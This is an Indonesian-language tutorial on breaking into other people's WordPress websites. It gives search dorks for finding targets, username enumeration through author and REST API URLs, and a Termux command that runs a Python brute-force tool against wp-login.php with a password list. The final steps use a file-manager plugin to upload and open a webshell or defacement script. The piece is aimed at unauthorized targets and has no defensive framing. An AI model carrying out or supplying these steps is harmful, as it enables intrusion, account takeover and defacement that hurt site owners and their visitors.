Oke, kali ini gw bakal sharing tutorial bagaimana cara brute force wordpress login pada website.


Bahan-bahan yang di perlukan :

- Termux.

- Tools brute force here.

- Password list here.

- Webshell/sc depes.


Dork :

- intitle:"my blog - my wordpress blog" site:.

- intext:"Hello World!"

- inurl:author/admin intext:welcome to wordpress

- inurl:wp site:.

- intext:"proudly powered by wordpress"

(Kembangin pake otak cemerlang kalian:v)


Langkah-langkah

1. Pertama-tama kalian dorking dulu untuk cari target wordpress yang bakal di eksekusi.


2. Nah, setelah udah dapet targetnya kemudian kita cari username nya dengan cara menambahkan ?author=1 atau /wp-json/wp/v2/users setelah domain nya contoh :

- http://site.com/?author=1

- http://site.com/wp-json/wp/v2/users

Dengan ?author=1

Dengan /wp-json/wp/v2/users


3. Setelah ketemu username nya kalian tinggal ketik wp-login.php setelah domain nya untuk akses halaman login, dan kalian coba tes masuk menggunakan username yang sudah kalian temukan, passwordnya boleh acak, jika muncul kata "The password you entered for the username admin is incorrect.", maka kemungkinan username admin itu terdaftar di database nya , contoh :

- http://site.com/wp-login.php atau

- http://site.com/[PATH]/wp-login.php


4. Nah, disini kita tinggal brute force aja, kalian ke termux lalu masukkan command seperti berikut :

- pkg update && upgrade

- termux-setup-storage

- pkg install python2

- cd storage/emulated/0/ <- arahkan ke tempat kalian menyimpan toolsnya, sebagai contoh disini saya menyimpan tools saya di /storage/emulated/0/Download/Tools

Sekarang kita tinggal lakukan brute force, caranya?

- python2 wpbf.py -h http://targetkalian.com/wp-login.php -u username -P wordlistpw.txt 

tekan enter dan tunggu beberapa menit, sampai muncul hasilnya seperti ini :


5. Dah ketemu user sama pass nya kalian balik lagi ke halaman login nya, lalu masukkan user sama pass yang telah kalian dapet tadi lalu tekan enter, secara otomatis akan diarahkan ke halaman dashboard nya.


6. Untuk upshell, kalian ke bagian menu nav nya di sudut kiri atas pilih "Plugins" lalu "Add New".


7. Kalian tinggal cari aja di kolom pencarian "File manager" lalu klik "install plugin","active".


8. Lalu kalian pergi ke menu nya lagi scroll kebawah sampe ketemu "WP File Manager" lalu kalian klik.


9. Disini kalian tinggal upload shell atau sc depes kalian terserah.


10. Cara akses? http://targetkalian.com/shell.php atau Tekan and tahan file shell sampe muncul menu, kalian tekan paling bawah "Get Info & Share" lalu tinggal klik aja nama shell kalian dan otomatis dibawa ke shell nya.


Oke, mungkin itu aja tutorial kali ini, jangan lupa untuk liat² tutorial lainnya yang menambah ilmu heker kalian:v, Sekian Wassalam wr wb.